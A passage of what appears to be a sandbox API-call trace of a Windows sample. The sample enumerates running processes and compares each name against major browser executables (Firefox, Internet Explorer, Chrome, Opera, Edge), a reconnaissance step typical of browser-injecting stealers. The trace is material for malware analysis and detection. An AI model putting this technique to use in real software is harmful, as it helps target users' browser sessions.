(dwMilliseconds=0x3e8) [0248.602] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0248.604] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.605] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0248.605] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0248.605] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0248.605] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0248.605] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0248.605] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0248.605] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0248.605] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0248.605] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0248.605] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0248.605] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0248.606] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0248.606] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0248.606] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0248.606] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0248.606] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0248.606] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.606] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.607] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0248.607] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0248.607] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0248.607] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0248.607] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.607] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0248.607] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0248.607] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0248.607] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0248.607] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0248.607] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.607] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.608] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0248.608] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0248.608] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0248.608] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0248.608] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.608] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0248.608] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0248.608] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0248.608] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0248.608] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0248.608] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.608] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0248.609] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0248.609] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0248.609] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0248.609] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0248.609] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.609] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0248.609] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0248.609] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0248.609] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0248.610] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0248.610] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.610] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0248.610] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0248.610] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0248.610] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0248.610] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0248.610] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.610] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.611] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.611] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.611] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.611] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0248.611] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.611] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.611] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.611] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.611] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.612] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0248.612] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.612] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.612] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.612] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.612] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.612] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0248.612] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.612] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.613] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.613] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.613] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.613] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0248.613] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.613] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.613] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.613] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.613] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.613] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0248.613] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.613] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0248.614] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0248.614] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0248.614] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0248.614] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0248.614] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.614] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.614] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.614] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.614] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.614] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0248.614] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.614] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.615] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.615] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.615] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.615] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0248.615] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.615] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0248.615] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0248.616] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0248.616] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0248.616] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0248.616] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.616] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0248.616] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0248.616] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0248.616] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0248.616] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0248.616] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.616] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0248.617] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0248.617] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0248.617] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0248.617] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0248.617] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.617] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.617] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.617] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.617] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.617] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0248.617] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.617] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0248.618] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0248.618] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0248.618] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0248.618] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0248.618] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.618] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0248.618] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0248.618] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0248.618] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0248.618] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0248.618] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.619] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0248.619] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0248.619] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0248.619] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0248.619] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0248.619] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.619] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0248.620] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0248.620] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0248.620] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0248.620] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0248.620] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.620] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0248.620] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0248.620] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0248.620] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0248.620] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0248.620] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.620] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0248.621] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0248.621] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0248.621] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0248.621] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0248.621] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.621] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0248.621] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0248.621] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0248.621] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0248.621] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0248.621] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.621] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0248.622] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0248.622] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0248.622] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0248.622] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0248.622] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.622] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0248.622] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0248.622] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0248.622] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0248.623] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0248.623] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.623] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0248.623] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0248.623] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0248.623] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0248.623] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0248.623] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.623] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0248.624] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0248.624] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0248.624] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0248.624] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0248.624] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.624] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0248.624] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0248.624] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0248.624] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0248.624] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0248.624] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.624] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0248.625] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0248.625] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0248.625] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0248.625] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0248.625] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.625] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0248.625] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0248.625] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0248.625] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0248.625] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0248.625] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.625] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0248.626] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0248.626] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0248.626] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 